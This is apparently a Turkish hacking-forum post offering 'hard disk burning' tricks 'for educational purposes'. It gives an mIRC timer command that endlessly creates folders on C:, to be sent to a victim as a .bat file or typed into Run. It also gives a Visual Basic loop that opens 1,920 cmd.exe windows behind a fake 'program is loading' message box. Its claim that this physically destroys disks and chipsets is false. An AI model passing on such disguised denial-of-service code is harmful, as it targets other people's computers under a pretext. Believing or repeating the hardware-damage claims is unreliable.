Bunu eklemek mecburiyetinde(Ogrenmesi Hatali konusmamasi icin ) kaldim!!!!
isdegi uzre nasil olamaz mis?
quote="2run34"]
PC hdd yakmak istermisiniz!!!
Egitim Amaclidir!!!
--------------------------------------------------------------------------------
kodu ya başlat çalıştıra yazdırın ya da not defterine koyup .bat seklinde kaydedip yollayın...
kurban başlat/çalıştıra altta verdiğim kodları yazarsa HDD si çöker
kod:
/timersecure 0 0 //mkdir $mid(c:,1,2) $+ $rand(1,99999) $+ $rand(A,Z) $+ $rand(a,z)
:14sz8:
Egitim Amacli dir!!!
hdd yakma (hard disk)
--------------------------------------------------------------------------------
kodu ya başlat çalıştıra yazdırın ya da not defterine koyup .bat seklinde kaydedip yollayın...
/timersecure 0 0 //mkdir $mid(C:,1,2) $+ $rand(1,99999) $+ $rand(A,Z) $+ $rand(a,z)
Egitim Amac lidir!!
Hesaplamalarıma göre Bu Çalışmam Donanıma Oldukça Çok Zarar Verecektir..
Vb ile For Next Döngüsü Kullanarak Hazırladım Oldukça Basit...
Kodlar... :
Kod:
For i= 1 to 1920
shell "cmd.exe"
Next
End Sub...
Bu kodu ister bir butona yada labele yada vs.. .istediğiniz yere yazabılırsınız form load kısmına yazarsanız program calısır calısmaz devreye girer...
Şahsen Ben Kodu Böyle Kodladım..
Kod:
MsgBox "Lütfen Bekleyiniz (Please Wait ", 4, "Program Yüklenmeye Hazırlanıyor"
For i= 1 to 1920
shell "cmd.exe"
Next
Yani Program Çalıştırıldığında Bir Mesaj Çıkıyor, Program Yüklenmeye Hazırlanıyor lütfen bekleyiniz diye tamam diyince İşleme Geçiyor ve 1920 tane cmd penceresi açıyor...
Kod:
shell "cmd.exe"yerine istediğiniz bir .exe uzantılı bir programı yazabılırsınız örn:
Kod:
shell "C:\Program Files\Microsoft Visual Studio 8\Common7\IDE/vbexpress.exeşeklinde ...
Kod:
For i= 1 to 1920kısmı ise 1 ile 1920 arası çalıştır diyor yani beklediği süre içinde o kadar pencere açar yani 1 to (istediğiniz bir sayı yazabilirsiniz örneğin kendinizde denemek için i= 1 to 5 gibi ...
Zararı ise => HDD Park Halindeyken Birden Pek Çok İşlem Gerçekleşmesi İsteniyor.... HDD Bu Kadar Komutu Üst Üste Algılayamadığı İçin Sürekli Park ve Disk Üzerine Geliyor... ve HDD Nin Yanmasına Sebeb Oluyor + Yüksek Görsellikte .exe Çalıştırdınızı düşünürsek Ekran Kartı vs.. .diğer Donanımlara da Zararı Büyük Olabilir.. .Örneğin: Chipset
Tabi Çok Etkili Olmasını İstiyorsak Kodları Biraz Değiştiredek C yada C++ da Yapmak Lazım
Sistemi Duman Eder ... .
Egitim Amaclidir
http://www.turkworm.com/default/pc_hack_security-b8.0/
http://www.masterhack.com/hdd-yakma-har ... 4d3c1&
Yorum Yaz
Giriş Yap Üye Ol